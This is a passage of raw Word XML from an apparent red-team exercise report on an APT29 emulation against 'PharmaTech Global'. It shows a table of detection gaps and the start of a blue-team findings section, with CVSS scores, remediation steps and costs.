                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Application lacks input validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidTr="0054007D">
        <w:trPr>
          <w:trHeight w:val="710"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>MySQL Database Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2085" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Database Activity Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Unauthorized database queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4050" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="0054007D" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Default credentials; no database security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidTr="0054007D">
        <w:trPr>
          <w:trHeight w:val="656"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Data Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2085" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>DLP solution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Large file upload blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4050" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="0054007D" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>No visibility into data movement; critical gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidTr="0054007D">
        <w:trPr>
          <w:trHeight w:val="665"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Persistence (Scheduled Task)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2085" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="007A331F" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Windows Event Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2070" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="0054007D" w:rsidP="0054007D">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="278"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Task Scheduler event 4698</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4050" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007A331F" w:rsidRPr="00C57BFC" w:rsidRDefault="0054007D" w:rsidP="0054007D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Event log retention only 7 days; no proactive monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0054007D" w:rsidRPr="00C57BFC" w:rsidRDefault="0054007D" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Critical Detection Gaps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>No EDR:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential dumping and malware execution went undetected [58].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>No SOC:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 47 alerts uninvestigated; prolonged dwell time [59].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>No DLP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 85MB data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exfiltrated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> unnoticed [60].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Insufficient Cloud Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> AWS compromise undetected [61].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Weak IAM:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Single-factor authentication enabled attacks [62].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>No PAM:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Domain Admin plaintext credentials [63].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00501FD3" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00993BFF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Flat Network:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral movement unrestricted [64].</w:t>
      </w:r>
      <w:r w:rsidR="00501FD3" w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00387B68" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.6 Technical Report for</w:t>
      </w:r>
      <w:r w:rsidR="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Blue Team</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Executive Summary:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:br/>
        <w:t xml:space="preserve">Operation IP Shield emulated APT29 attacks, fully compromising </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>PharmaTech</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>Global’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> hybrid environment in 13 days. Seven critical and 12 high-severity vulnerabilities were identified, allowing IP exfiltration and persistent domain access. The root cause is the absence of foundational security controls, including EDR, SOC, and MFA.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Critical Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>1. Missing MFA</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> – CRITICAL (CVSS 9.8) [65]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>Systems: VPN, Jenkins, AWS, RDP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>Impact: Single password grants full access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>Remediation: FIDO2 hardware tokens, AWS MFA, Jenkins MFA [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>66][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>67]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>Cost: £50,000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>2. No EDR</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> – CRITICAL (CVSS 9.1) [68]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>Systems: All endpoints and servers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>Impact: Malware and credential theft undetected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve">Remediation: Deploy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00387B68">
        <w:t>CrowdStrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> or MS Defender; integrate with SIEM [69]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:t>Cost: £120,000/year</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>3. No DLP</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:t xml:space="preserve"> – CRITICAL (CVSS 8.7) [</w:t>
      </w:r>
